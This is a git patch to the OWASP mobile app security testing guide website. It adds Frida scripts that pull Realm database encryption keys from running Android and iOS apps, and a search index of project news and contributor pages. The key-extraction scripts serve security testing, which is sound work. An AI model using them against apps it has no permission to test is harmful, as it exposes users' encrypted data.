From 38932a87c1881c859dd07e47e66e1f4e09239e75 Mon Sep 17 00:00:00 2001 From: <> Date: Thu, 2 May 2024 05:46:33 +0000 Subject: [PATCH] Deployed 52c8b71f with MkDocs version: 1.6.0 --- .../0x05d-Testing-Data-Storage/index.html | 60 +++++++++++++++++- .../iOS/0x06d-Testing-Data-Storage/index.html | 41 ++++++++++++ search/search_index.json | 2 +- sitemap.xml.gz | Bin 127 -> 127 bytes 4 files changed, 101 insertions(+), 2 deletions(-) diff --git a/MASTG/Android/0x05d-Testing-Data-Storage/index.html b/MASTG/Android/0x05d-Testing-Data-Storage/index.html index 6c737f99ef..a85818e997 100644 --- a/MASTG/Android/0x05d-Testing-Data-Storage/index.html +++ b/MASTG/Android/0x05d-Testing-Data-Storage/index.html @@ -12219,7 +12219,65 @@
If the database is not encrypted, you should be able to obtain the data. If the database is encrypted, determine whether the key is hard-coded in the source or resources and whether it is stored unprotected in shared preferences or some other location.
+Access to the data depends on the encryption: unencrypted databases are easily accessible, while encrypted ones require investigation into how the key is managed - whether it's hardcoded or stored unencrypted in an insecure location such as shared preferences, or securely in the platform's KeyStore (which is best practice).
+However, if an attacker has sufficient access to the device (e.g. root access) or can repackage the app, they can still retrieve encryption keys at runtime using tools like Frida. The following Frida script demonstrates how to intercept the Realm encryption key and access the contents of the encrypted database.
'use strict';

// Mathematical modulo: unlike the `%` operator, which keeps the sign of
// the dividend, this always returns a value in [0, n) for positive n.
function modulus(x, n) {
  var shifted = (x % n) + n;
  return shifted % n;
}
+
// Render an array of byte values as an uppercase hex string, two digits
// per byte (e.g. [0, 255] -> "00FF"). Signed input bytes (as produced by
// a Java byte[]) are masked to their unsigned 8-bit value first.
function bytesToHex(bytes) {
  var digits = [];
  for (var i = 0; i < bytes.length; i++) {
    var unsignedByte = bytes[i] & 0xFF;
    digits.push(unsignedByte.toString(16).toUpperCase().padStart(2, "0"));
  }
  return digits.join("");
}
+
// Convert an array of (possibly signed) byte values into a string by
// mapping each value modulo 256 to the corresponding char code.
function b2s(array) {
  var chars = [];
  for (var i = 0; i < array.length; i++) {
    // Normalize to [0, 255] so negative Java bytes map correctly.
    var code = ((array[i] % 256) + 256) % 256;
    chars.push(String.fromCharCode(code));
  }
  return chars.join("");
}
+
// Main entry point: only runs when the Frida Java bridge is available,
// i.e. the script is attached to an Android/ART process.
if(Java.available){
  console.log("Java is available");
  console.log("[+] Android Device.. Hooking Realm Configuration.");

  // All Java API access must happen inside Java.perform, which attaches
  // the current thread to the VM.
  Java.perform(function(){
    var RealmConfiguration = Java.use('io.realm.RealmConfiguration');
    if(RealmConfiguration){
      console.log("[++] Realm Configuration is available");
      // Enumerate io.realm.Realm instances already live in the app heap.
      Java.choose("io.realm.Realm", {
        onMatch: function(instance)
        {
          console.log("[==] Opened Realm Database...Obtaining the key...")
          console.log(instance);
          console.log(instance.getPath());
          console.log(instance.getVersion());
          // The encryption key is read from the instance's configuration;
          // it is printed raw, with its length, and as uppercase hex.
          var encryption_key = instance.getConfiguration().getEncryptionKey();
          console.log(encryption_key);
          console.log("Length of the key: " + encryption_key.length);
          console.log("Decryption Key:", bytesToHex(encryption_key));

        },
        onComplete: function(instance){
          // After enumeration completes, override this specific
          // RealmConfiguration constructor overload so that configurations
          // created later are also observed.
          // NOTE(review): the replacement body never invokes the original
          // $init, so a configuration constructed after this hook is
          // installed may be left uninitialized — confirm against the
          // Frida Java bridge semantics before relying on this.
          RealmConfiguration.$init.overload('java.io.File', 'java.lang.String', '[B', 'long', 'io.realm.RealmMigration', 'boolean', 'io.realm.internal.OsRealmConfig$Durability', 'io.realm.internal.RealmProxyMediator', 'io.realm.rx.RxObservableFactory', 'io.realm.coroutines.FlowFactory', 'io.realm.Realm$Transaction', 'boolean', 'io.realm.CompactOnLaunchCallback', 'boolean', 'long', 'boolean', 'boolean').implementation = function(arg1)
          {
            console.log("[==] Realm onComplete Finished..")

          }
        }

      });
    }
  });
}
+
You can save files to the device's internal storage. Files saved to internal storage are containerized by default and cannot be accessed by other apps on the device. When the user uninstalls your app, these files are removed. The following code snippets would persistently store sensitive data to internal storage.
diff --git a/MASTG/iOS/0x06d-Testing-Data-Storage/index.html b/MASTG/iOS/0x06d-Testing-Data-Storage/index.html index 70f6503ad1..a35b27f46b 100644 --- a/MASTG/iOS/0x06d-Testing-Data-Storage/index.html +++ b/MASTG/iOS/0x06d-Testing-Data-Storage/index.html @@ -12021,6 +12021,47 @@Access to the data depends on the encryption: unencrypted databases are easily accessible, while encrypted ones require investigation into how the key is managed - whether it's hardcoded or stored unencrypted in an insecure location such as shared preferences, or securely in the platform's KeyStore (which is best practice). +However, if an attacker has sufficient access to the device (e.g. jailbroken access) or can repackage the app, they can still retrieve encryption keys at runtime using tools like Frida. The following Frida script demonstrates how to intercept the Realm encryption key and access the contents of the encrypted database.
// Return the raw bytes of an NSData object as a lowercase hex string,
// two digits per byte. `data` is a Frida ObjC.Object wrapping NSData;
// each byte is read individually from its backing buffer.
function nsdataToHex(data) {
  var pieces = [];
  for (var i = 0; i < data.length(); i++) {
    var value = Memory.readU8(data.bytes().add(i));
    pieces.push((value & 0xFF).toString(16).padStart(2, '0'));
  }
  return pieces.join('');
}
+
// Hook RLMRealmConfiguration so the Realm encryption key can be captured
// at the moment the app sets it. Requires the Frida ObjC bridge (i.e. an
// iOS process with the Objective-C runtime loaded).
function HookRealm() {
  if (ObjC.available) {
    console.log("ObjC is available. Attempting to intercept Realm classes...");
    const RLMRealmConfiguration = ObjC.classes.RLMRealmConfiguration;
    // Attach to the native implementation of
    // -[RLMRealmConfiguration setEncryptionKey:].
    Interceptor.attach(ObjC.classes.RLMRealmConfiguration['- setEncryptionKey:'].implementation, {
      onEnter: function(args) {
        // For an ObjC method: args[0] = self, args[1] = selector,
        // args[2] = first argument (the NSData* encryption key).
        var encryptionKeyData = new ObjC.Object(args[2]);
        console.log(`Encryption Key Length: ${encryptionKeyData.length()}`);
        // Hexdump the encryption key
        var encryptionKeyBytes = encryptionKeyData.bytes();
        console.log(hexdump(encryptionKeyBytes, {
          offset: 0,
          length: encryptionKeyData.length(),
          header: true,
          ansi: true
        }));

        // Convert the encryption key bytes to a hex string
        var encryptionKeyHex = nsdataToHex(encryptionKeyData);
        console.log(`Encryption Key Hex: ${encryptionKeyHex}`);
      },
      onLeave: function(retval) {
        console.log('Leaving RLMRealmConfiguration.- setEncryptionKey:');
      }
    });

  }

}
The OWASP Mobile Application Security (MAS) flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MASTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.
Download the MASVS Download the MASTG Download the Checklist "},{"location":"#trusted-by","title":"Trusted By","text":"The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"#mas-advocates","title":"\ud83e\udd47 MAS Advocates","text":"
MAS Advocates are key industry adopters of the OWASP MASVS and MASTG who have invested a significant and consistent amount of resources to drive the project forward and ensure its continued success. This includes making consistent high-impact contributions and actively promoting the adoption and usage of the project. Learn more.
"},{"location":"contact/","title":"\ud83d\udcac Connect with Us","text":"You can follow and reach out to the OWASP MAS team in many ways.
If you'd like to contribute, take a look at our Contributions page or reach out to the project leaders Carlos or Sven.
Request an invitation to join our Slack channel #project-mobile-app-security
Carlos is a mobile security research engineer who has gained many years of hands-on experience in the field of security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"contact/#sven-schleier","title":"Sven Schleier","text":"
Sven is an experienced web and mobile penetration tester and assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer that supported many projects end-to-end during the SDLC to \"build security in\". He was speaking at local and international meetups and conferences and is conducting hands-on workshops about web application and mobile app security.
"},{"location":"contributing/","title":"Contributing to the MAS Project","text":"
First of all, \u2b50 Give us a Star in GitHub!
The MAS project is an open source effort and we welcome all kinds of contributions and feedback.
Help us improve & join our community:
Contribute with content:
Before you start contributing, please check our pages \"How Can You Contribute?\" and \"Getting Started\". If you have any doubts please contact us.
"},{"location":"contributing/#what-not-to-do","title":"\ud83d\udeab What not to do","text":"Although we greatly appreciate any and all contributions to the project, there are a few things that you should take into consideration:
Please be sure to take a careful look at our Code of Conduct for all the details and ask us in case of doubt.
"},{"location":"contributing/#our-contributors","title":"Our Contributors","text":"All of our contributors are listed in GitHub repos. See OWASP MASTG Authors & Co-Authors, MASTG Contributors and MASVS Contributors.
Update March 2023: We're creating a new concept for contributions that aligns with the new MASTG v2 workflows. Stay tuned...
"},{"location":"contributing/#owasp-mas-project-featured-contributions","title":"OWASP MAS Project Featured Contributions","text":"Coming soon...
"},{"location":"contributing/#owasp-mastg-v2","title":"OWASP MASTG V2","text":"Coming soon...
"},{"location":"contributing/#owasp-masvs-v1","title":"OWASP MASVS V1","text":"The latest version of the MASVS v1 including all translations is available here: https://github.com/OWASP/owasp-masvs/releases/tag/v1.5.0
Project Lead Lead Author Contributors and Reviewers Sven Schleier and Carlos Holguera Bernhard Mueller, Sven Schleier, Jeroen Willemsen and Carlos Holguera Alexander Antukh, Mesheryakov Aleksey, Elderov Ali, Bachevsky Artem, Jeroen Beckers, Jon-Anthoney de Boer, Ben Cheney, Will Chilcutt, Stephen Corbiaux, Ratchenko Denis, Ryan Dewhurst, @empty_jack, Ben Gardiner, Manuel Delgado, Anton Glezman, Josh Grossman, Sjoerd Langkemper, Vin\u00edcius Henrique Marangoni, Martin Marsicano, Roberto Martelloni, @PierrickV, Julia Potapenko, Andrew Orobator, Mehrad Rafii, Javier Ruiz, Abhinav Sejpal, Stefaan Seys, Yogesh Sharma, Prabhant Singh, Nikhil Soni, Anant Shrivastava, Francesco Stillavato, Abdessamad Temmar, Pauchard Thomas, Lukasz Wierzbicki Language Translators & Reviewers Brazilian Portuguese Mateus Polastro, Humberto Junior, Rodrigo Araujo, Maur\u00edcio Ariza, Fernando Galves Chinese (Traditonal) Peter Chi, Lex Chien, Henry Hu, Leo Wang Chinese (Simplified) Bob Peng, Harold Zang, Jack S French Romuald Szkudlarek, Abderrahmane Aftahi, Christian Dong (Review) German Rocco Gr\u00e4nitz, Sven Schleier (Review) Hindi Mukesh Sharma, Ritesh Kumar, Kunwar Atul Singh, Parag Dave, Devendra Kumar Sinha, Vikrant Shah Japanese Koki Takeyama, Riotaro Okada (Review) Korean Youngjae Jeon, Jeongwon Cho, Jiyou Han, Jiyeon Sung Persian Hamed Salimian, Ramin Atefinia, Dorna Azhirak, Bardiya Akbari, Mahsa Omidvar, Alireza Mazhari, Milad Khoshdel Portuguese Ana Filipa Mota, Fernando Nogueira, Filipa Gomes, Luis Fontes, S\u00f3nia Dias Russian Gall Maxim, Eugen Martynov, Chelnokov Vladislav, Oprya Egor, Tereshin Dmitry Spanish Martin Marsicano, Carlos Holguera Turkish An\u0131l Ba\u015f, Haktan Emik Greek Panagiotis Yialouris"},{"location":"contributing/#owasp-mastg-v1","title":"OWASP MASTG V1","text":"The latest version of the MASTG v1 is available here: https://github.com/OWASP/owasp-mastg/releases/tag/v1.5.0
Note: This contributor table is generated based on our GitHub contribution statistics. For more information on these stats, see the GitHub Repository README. We manually update the table, so be patient if you're not listed immediately.
We thank our donators for providing the funds to support us on our project activities.
The OWASP Foundation is very grateful for the support by the individuals and organizations listed. However please note, the OWASP Foundation is strictly vendor neutral and does not endorse any of its supporters. Donations do not influence the content of the MASVS or MASTG in any way.
While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes a little bit of outside help is required.
Monetary Donations: You can donate any amount you like, no matter how small, anyone can help. From 500$ up you may select a Donation Package and be listed as a donator.
100% of the funds go to the OWASP Foundation and allow us funding our project activities such as contracting technical editors, graphic designers, software developers, purchasing test devices, creating swag, etc.
Donate Purchase the MASTG
Effort Based: You can instead support the project by contributing with your work and end up at our acknowledgement section.
If you're a company, consider becoming a \"MAS Advocate\" which is the highest status that companies can achieve in the project acknowledging that they've gone above and beyond to support the project.
Contribute Become a MAS Advocate
"},{"location":"news/","title":"\ud83d\uddde News","text":"Tip: Follow us on Twitter!
Follow @OWASP_MAS to get the latest updates instantly.
"},{"location":"news/#feb-19th-2024-new-standard-for-secure-mobile-app-transactions-based-on-the-owasp-masvs-by-the-cyber-security-agency-of-singapore","title":"Feb 19th, 2024: New Standard for Secure Mobile App Transactions based on the OWASP MASVS by the Cyber Security Agency of Singapore","text":"The Cyber Security Agency of Singapore (CSA) launched the \"Safe App Standard\" on January 10, 2024. Tailored for local app developers and service providers, this guideline is based on the OWASP Mobile Application Security Verification Standard (MASVS) and focuses on critical areas such as authentication and authorization (MASVS-AUTH), data storage (MASVS-STORAGE), and tamper resistance (MASVS-RESILIENCE). The initiative aims to protect apps from common cyber threats and ensure a safer digital space for users.
While the Safe App Standard is a significant step forward in securing mobile applications, developers are encouraged to consider the full MASVS and select the appropriate MAS profiles for comprehensive protection. This holistic approach to app security ensures that apps go beyond meeting the baseline and are protected against a wider range of cyber threats, providing robust security for end users.
"},{"location":"news/#jan-18th-2024-masvs-v210-release-masvs-privacy","title":"Jan 18th, 2024: MASVS v2.1.0 Release & MASVS-PRIVACY","text":"
We are thrilled to announce the release of the new version of the OWASP Mobile Application Security Verification Standard (MASVS) v2.1.0 including the new MASVS-PRIVACY category and CycloneDX support.
"},{"location":"news/#masvs-privacy","title":"MASVS-PRIVACY","text":"After collecting and processing all feedback from the MASVS-PRIVACY Proposal we're releasing the new MASVS-PRIVACY category.
The main goal of MASVS-PRIVACY is to provide a baseline for user privacy. It is not intended to cover all aspects of user privacy, especially when other standards and regulations such as ENISA or the GDPR already do that. We focus on the app itself, looking at what can be tested using information that's publicly available or found within the app through methods like static or dynamic analysis.
While some associated tests can be automated, others necessitate manual intervention due to the nuanced nature of privacy. For example, if an app collects data that it didn't mention in the app store or its privacy policy, it takes careful manual checking to spot this.
The new controls are:
The MASVS is now available in CycloneDX format (OWASP_MASVS.cdx.json), a widely adopted standard for software bill of materials (SBOM). This format enables easier integration and automation within DevOps pipelines, improving visibility and management of mobile app security. By using CycloneDX, developers and security teams can more efficiently assess, track and comply with MASVS requirements, resulting in more secure mobile applications.
"},{"location":"news/#jan-11th-2024-mobile-application-risk-scoring-qa","title":"Jan 11th, 2024: Mobile Application Risk Scoring Q&A","text":"We've received many comments and excellent questions, which we've compiled and summarized, along with the authors' answers. We'd like to thank everyone who took the time to read the document and especially those who asked valuable questions.
See Mobile Application Risk Scoring Q&A
"},{"location":"news/#oct-10th-2023-masvs-privacy","title":"Oct 10th, 2023: MASVS-PRIVACY","text":"Mobile applications frequently access sensitive user data to deliver their core functionalities. This data ranges from personally identifiable information (PII), health metrics, location data, to device identifiers. Mobile devices are a constant companion to users, always connected, and equipped with numerous sensors\u2014including cameras, microphones, GPS and BLE\u2014that generate data capable of inferring user behavior and even identifying individuals. The landscape is further complicated by advanced tracking techniques, the integration of third-party SDKs, and a heightened awareness of privacy issues among users and regulators. As a response, there's a growing trend towards on-device processing to keep user data localized and more secure.
Today we're excited to announce the release of the new MASVS-PRIVACY, a new MASVS category and MAS profile with focus on privacy. The new profile is designed to help organizations and individuals assess the privacy implications of their mobile applications and make informed decisions.
The new controls are:
The proposal defines the scope of the new MASVS-PRIVACY category and profile, and includes a detailed description of each control, a rationale, and a list of tests. The new profile MAS-P, establishes a baseline for privacy and is intended to work cohesively, and in some cases even overlap, with other OWASP MAS profiles, such as MAS-L1 and MAS-L2, ensuring a holistic approach to both security and privacy.
Call to Action:
We'd be thrilled to hear what you think! Your input is really important to us, and it can make a big difference in shaping the final version of the document. Please take a moment to review it and share your comments, feedback, and ideas.
Review Timeline: until November 30, 2023
Please follow the link here to access the document: https://docs.google.com/document/d/1jq7V9cRureRFF_XT7d_Z9H_SLsaFs43cE50k6zMRu0Q/edit?usp=sharing
"},{"location":"news/#sept-29th-2023-mastg-refactor-part-2-techniques-tools-reference-apps","title":"Sept 29th, 2023: MASTG Refactor Part 2 - Techniques, Tools & Reference Apps","text":"We are thrilled to announce the second phase of the MASTG (Mobile Application Security Testing Guide) refactor. These changes aim to enhance the usability and accessibility of the MASTG.
The primary focus of this new refactor is the reorganization of the MASTG content into different components, each housed in its dedicated section/folder and existing now as individual pages in our website (markdown files with metadata/frontmatter in GitHub):
Tests:
tests/
folder.MASTG-TEST-XXXX
.Techniques:
techniques/
folder.MASTG-TECH-XXXX
.Tools:
tools/
folder.MASTG-TOOL-XXXX
.Apps:
apps/
folder.MASTG-APP-XXXX
.We hope that the revamped structure enables you to navigate the MASTG more efficiently and access the information you need with ease.
"},{"location":"news/#sep-20th-2023-request-for-community-review-new-risk-assessment-formula-for-mobile-applications","title":"Sep 20th, 2023: Request for Community Review: New Risk Assessment Formula for Mobile Applications","text":"We are excited to announce the release of a new collaborative effort between industry, academia, and the OWASP Mobile Application Security (MAS) project. This document introduces a novel formula designed to measure the risk associated with mobile applications.
Document Highlights:
Call to Action:
We invite you to review the document and share your comments, feedback, and suggestions. Your insights are invaluable to us and will contribute significantly to the final version.
Review Timeline: until October 31, 2023
Please follow the link here to access the document: https://docs.google.com/document/d/1dnjXoHpVL5YmZTqVEC9b9JOfu6EzQiizZAHVAeDoIlo/edit?usp=sharing
By collaborating on this initiative, we aim to provide a structured and flexible framework for risk assessment that assists organizations and individuals in making informed security decisions. We look forward to your active participation and valuable feedback!
"},{"location":"news/#jul-28th-2023-mas-testing-profiles-and-mastg-atomic-tests-paving-the-way-for-next-level-mobile-application-security","title":"Jul 28th, 2023: MAS Testing Profiles and MASTG Atomic Tests - Paving the Way for Next-Level Mobile Application Security","text":"The MASTG refactoring is a significant upgrade that addresses some existing challenges and introduces exciting new features. It aims to streamline compliance, simplify testing and improve usability for security testers and other stakeholders.
"},{"location":"news/#mas-testing-profiles","title":"MAS Testing Profiles","text":"As part of the MASVS refactoring, we've replaced the three traditional verification levels (L1, L2, and R) with security testing profiles in the MASTG. These new profiles are designed to enhance our ability to capture various security nuances associated with mobile apps, allowing us to evaluate different situations for the same MASVS control. For instance, in MASVS-STORAGE-1, it's acceptable to store data unencrypted in app internal storage for MAS-L1, but MAS-L2 requires data encryption.
The new MAS Testing Profiles include revamped versions of the traditional levels and one new addition:
Another interesting addition we're exploring for the near future is a 'Privacy' profile, which would focus on tests that consider the privacy implications of various app features and functionalities. We believe that this profile can become an essential tool in an era where privacy has become a significant concern.
HELP WANTED: Today we're releasing the new MAS Testing Profiles and would love to hear what you think. Please give your feedback here until the 31st of August 2023.
"},{"location":"news/#atomic-tests","title":"Atomic Tests","text":"One of the key changes in the MASTG refactoring is the introduction of the new MASTG Atomic Tests. The existing tests are currently quite large and often cover more than one MASVS control. With the introduction of Atomic Tests, we'll break these tests down into smaller, more manageable pieces. Our goal is to make these tests as self-contained and specific as possible to allow for reduced ambiguity, better understanding and easier execution. Each atomic test will have its unique ID for easy reference and traceability and will be mapped to the relevant controls from the MASVS.
But before we can start writing the new atomic tests, we need to finalize the proposal for the new MASTG Atomic Tests including mappings to the MASVS controls and the new MAS Testing profiles.
HELP WANTED: Today we're releasing the new MASTG Atomic Tests Proposal and would love to hear what you think. Please give your feedback here until the 31st of August 2023.
"},{"location":"news/#whats-next","title":"What's Next?","text":"We are now in the process of transforming the MASTG, according to the changes highlighted above. We've already released the MASVS v2.0.0, and the rest of the year will be dedicated to the MASTG refactoring, which will involve creating hundreds of new tests. We believe these changes will significantly improve the usability and relevance of the MASTG. We're excited to keep you updated on our progress and look forward to your continued support and feedback.
We would like to extend a special thanks to our MAS Advocate NowSecure. Their commitment to the OWASP project is not merely financial; it\u2019s an investment of their most valuable resource \u2013 their people and their time. NowSecure has dedicated hours of expertise, extensive knowledge, and hard work towards making these changes a reality.
Would you like to become a MAS Advocate? Contact us to learn more.
A huge thanks goes of course to our wider community and all of our contributors. Your continuous participation and input have been instrumental in the evolution of the OWASP MAS project. It is through this collaborative effort that we can truly advance in the field of mobile app security. Thank you for being a part of this journey!
"},{"location":"news/#may-8th-2023-masvs-v2-colors","title":"May 8th, 2023: MASVS v2 Colors","text":"We're bringing official colors to the MASVS! The new colors will be used across the MASVS v2.0.0 and MASTG v2.0.0 to help users quickly identify the different control groups. We've also revamped certain areas of our website to make them more readable and easier to navigate as well as to prepare for what's coming with the MASTG v2.0.0 (keyword: \"atomic tests\").
"},{"location":"news/#masvs","title":"MASVS","text":"
In the MASVS home page, the new colors will be used to highlight the different control groups.
The individual controls will also be color-coded to help users quickly identify the different control groups. We've also redesigned the control pages to make them more readable and easier to navigate.
"},{"location":"news/#mastg","title":"MASTG","text":"
Now, when you navigate to the MASTG tests, you'll see that they are categorized by platform (Android/iOS) as well as by MASVS category, also using our new colors in the sidebar. The colors will also be used to highlight the different control groups in the test description.
Each test now contains a header section indicating the platform, the MASVS v1.5.0 controls, and the MASVS v2.0.0 controls.
We've also introduced a new section called \"Resources\" which is automatically generated using the inline links within the MASTG pages and serve as a quick reference to the most important resources for each test.
NOTE: The MASTG tests themselves haven't changed yet, we're still working on the refactoring. For now we've simply split the tests into individual pages to make them easier to navigate and reference. This will facilitate the work on the refactoring and the introduction of the new atomic tests.
"},{"location":"news/#mas-checklist","title":"MAS Checklist","text":"The MAS Checklist pages and the MAS checklist itself have also been updated to use the new colors to highlight the different control groups and to make them easier to navigate.
When you click on a MASVS group you'll see a table listing the new MASVS v2.0.0 controls as well as the corresponding MASTG tests (v1.5.0) for both the Android and the iOS platforms.
NOTE: The checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming MASTG version, we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\", and assign the new MAS profiles accordingly.
We hope you like the new colors and the changes we've made to the website. We're looking forward to your feedback! Please use our GitHub Discussions to post any questions or ideas you might have. If you see something wrong please let us know by opening a bug issue.
"},{"location":"news/#april-1st-2023-masvs-v200-release","title":"April 1st, 2023: MASVS v2.0.0 Release","text":"We are thrilled to announce the release of the new version of the OWASP Mobile Application Security Verification Standard (MASVS) v2.0.0. With this update, we have set out to achieve several key objectives to ensure that MASVS remains a leading industry standard for mobile application security.
We believe that these changes will make the OWASP MASVS v2.0.0 an even more valuable resource for developers and security practitioners alike, and we are excited to see how the industry embraces these updates.
The MASVS v2.0.0 was presented at the OWASP AppSec Dublin 2023, you can watch the presentation \u25b6\ufe0f here.
"},{"location":"news/#why-are-there-no-levels-in-the-new-masvs-controls","title":"Why are there no levels in the new MASVS controls?","text":"The Levels you already know (L1, L2 and R) will be fully reviewed and backed up with a corrected and well-documented threat model.
Enter MAS Profiles: We are moving the levels to the MASTG tests so that we can evaluate different situations for the same control (e.g., in MASVS-STORAGE-1, it's OK to store data unencrypted in app internal storage for L1, but L2 requires data encryption). This can lead to different tests depending on the security profile of the application.
"},{"location":"news/#transition-phase","title":"Transition Phase","text":"The MASTG, in its current version v1.5.0, currently still supports the MASVS v1.5.0. Bringing the MASTG to v2.0.0 to be fully compatible with MASVS v2.0.0 will take some time. That's why we need to introduce a \"transition phase\". We're currently mapping all new proposed test cases to the new profiles (at least L1 and L2), so even if the MASTG refactoring is not complete, you'll know what to test for, and you'll be able to find most of the tests already in the MASTG.
We thank everyone that has participated in the MASVS Refactoring. You can access all Discussion and documents for the refactoring here.
You'll notice that we have one new author in the MASVS: Jeroen Beckers
Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
\ud83d\udc99 Special thanks to our MAS Advocate, NowSecure, who has once again demonstrated their commitment to the project by continuously supporting it with time/dedicated resources as well as feedback, data and content contributions.
"},{"location":"news/#august-23rd-2022-project-rebranding-to-owasp-mas","title":"August 23rd, 2022: Project Rebranding to OWASP MAS","text":"
Until now our project was called the \"OWASP Mobile Security Testing Guide (MSTG)\" project. Unfortunately, this was a source of confusion since we happen to have a resource with the same name, the OWASP MSTG. Not only that, that name doesn't reflect the full scope and reach of our project. Have you ever wondered why the MSTG is called MSTG and not MASTG? Both documents are about Mobile Application Security and we'd like to make that clear.
Today we are rebranding our project to \u201cOWASP Mobile App Security (MAS)\u201d. The OWASP MAS project includes:
We see MAS reflecting all the consistency, structure and transparency that we\u2019re bringing with our 2.0 versions.
The rebranding will happen gradually so expect changes to be rolled out over the upcoming days/weeks.
"},{"location":"news/#february-7th-2022-nist-800-218-recommendations-for-mitigating-the-risk-of-software-vulnerabilities","title":"February 7th, 2022: NIST 800-218 - Recommendations for Mitigating the Risk of Software Vulnerabilities","text":"We're happy to share the new NIST 800-218 (Feb 2022) mapping to the latest MASVS v1.4.2 (Jan 2022) especially MASVS-ARCH and MASVS-CODE:
\"Secure Software Development Framework (SSDF) v1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities\"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
"},{"location":"news/#november-17th-2021-from-slack-to-github-discussions","title":"November 17th, 2021: From Slack to GitHub Discussions","text":"Hello everyone,
times change, our project evolves and being able to hear you and discuss with you all is key for the OWASP MSTG project.
TL;DR: we deprecate Slack in favor of GitHub Discussions as our primary communication channel.
https://github.com/OWASP/owasp-mastg/discussions/ https://github.com/OWASP/owasp-masvs/discussions/
"},{"location":"news/#removing-obstacles","title":"Removing obstacles","text":"Until now we've driven all discussion on the MSTG Slack channel, to participate you had to get Slack, find the invite link (hope that it's still valid, else report it), go to our channel and post your question. It could really be a hurdle some times and some questions might be missed, there was also no way to up-vote them or keep track.
All our contributors do have a GitHub account (or should! now you have a reason :) ). So, from today on we move to GitHub discussions and deprecate Slack as the primary communication channel. You can still reach us there for private messages though and we will try to relay the discussions to Slack ASAP, but just as notifications (no Q&A over there).
Discussions provides a place to bring all those conversations together right next to your code. Whether it\u2019s asking questions, sharing announcements, or featuring important information, it\u2019s all in one place and easily accessible to contributors and community members alike.
"},{"location":"news/#separation","title":"Separation","text":"We want to separation regarding actionable things to do (issues) and ideas/proposals (now \"Ideas\" Discussion). Having it all in GitHub makes it sooo much easier for us to manage, reference, etc.
Think of it this way: Discussions are for talking and GitHub Issues are for doing. This helps minimize distractions, keep teams on track, and address topics and questions clearly in a dedicated forum. Plus, you can move seamlessly between the two as well by converting an issue to a discussion and vice versa with a simple click.
"},{"location":"news/#insights","title":"Insights","text":"Soon we will be able to see insights regarding the discussions. You guessed it, we'll take that into account and acknowledge your contribution to the discussions as we do with the content itself. More details on this once we can test the feature.
"},{"location":"news/#roadmap","title":"Roadmap","text":"or:
For this announcement we partially mapped this nice GitHub article to our project (recommended read): https://github.blog/2021-11-10-7-unique-software-collaboration-features-in-github-discussions/
"},{"location":"news/#may-23rd-2020-new-build-system-and-release-upcoming","title":"May 23rd 2020: New build system and release upcoming!","text":"As already shared during the virtual Dutch Chapter meetup: we are going to release a new version of the MSTG soon. We have been quite busy with moving it to the new build system first as the document got too large for our old tooling. This is a great incentive as well to think of how we can make the guide more focused so that the size does not matter ;-)
More news on the new release will follow soon...
"},{"location":"news/#april-10th-2020-stayhome-and-share-your-knowledge","title":"April 10th 2020: #StayHome and share your knowledge!","text":"Hi everybody,
we are all in more or less restrictive lock-down situations, but the guideline is always #StayHome. This is definitely a challenging time for you, but also us. But luckily it was also never easier to collaborate and share, through so many different tools and platforms.
The OWASP Mobile Security Testing Guide (MSTG) project team wants to encourage people to #StayHome and also use this time to share your knowledge with the community. So if you want to either share your knowledge in mobile security or are just keen in doing some research in this area, we have many open issues where we are still looking for volunteers.
If you can close 5 issues that we marked with the tag #StayHome we will send you in return a hard copy of the OWASP MSTG! We are giving away a total of 5 books on a first come first serve basis.
If you are interested, do the following:
Go through the open issues in our Github repo with the tag #StayHome.
Make a comment on the issue that you would like to take care of, which will be assigned on a first come first serve basis. For any clarifications you can ping either Carlos or Sven in OWASP Slack. If you don't have an account yet, please check here on how to register.
Work on the issue and create a Pull Request (PR). If you are new to Git(hub), check out our contribution guide for further details.
We will review the PR and merge once all comments are addressed/resolved.
Start at 1. :-)
We would love to have you as a contributor. Feel free to share the mail or like our tweet
Stay safe, take care and #StayHome!
Sven, Jeroen and Carlos
"},{"location":"news/#march-17th-2020-international-release-of-masvs-12","title":"March 17th, 2020: International release of MASVS 1.2","text":"A new version of the OWASP Mobile Application Security Standard (MASVS) was released! The MASVS establishes baseline security requirements for mobile apps and summarizes them in one standard. With this new release we achieved a significant alignment and coverage with existing mobile security documents from ENISA, older NIST documents, OWASP Mobile top 10, and others. The new version 1.2 is available in Github Releases: https://github.com/OWASP/owasp-masvs/releases/tag/v1.2. For more details please look into our Release Notes for Version 1.2 and Version 1.2-RC https://github.com/OWASP/owasp-mastg/releases/tag/v1.2.
Thanks to the great support of our community we have now 9 different languages available in total for the MASVS and would like to thank all of our translators for their great work and support throughout:
The MASVS and its translations are available in PDF, Mobile, ePub, docx and you can also read it via Gitbook. See here for details: https://github.com/OWASP/owasp-masvs/releases
The project team (Sven Schleier, Jeroen Willemsen and Carlos Holguera) would like to thank all the contributors, translators and those who build the improved automation around it and all their hard work and support in the last few months! New releases will be much faster thanks to our GitHub actions and Docker containers. Next to that, we are happy to add Korean and Chinese Simplified to our ever growing list of translations! We will finalize the document generation system and then apply the same build system to the Mobile Security Testing Guide (MSTG) in order to speed up the release process and release more frequently.
"},{"location":"news/#october-4th-2019-pre-release-of-masvs-12","title":"October 4th, 2019: Pre-release of MASVS 1.2!","text":"We have a pre-release of MASVS Version 1.2. This will be the reference document for further translations.
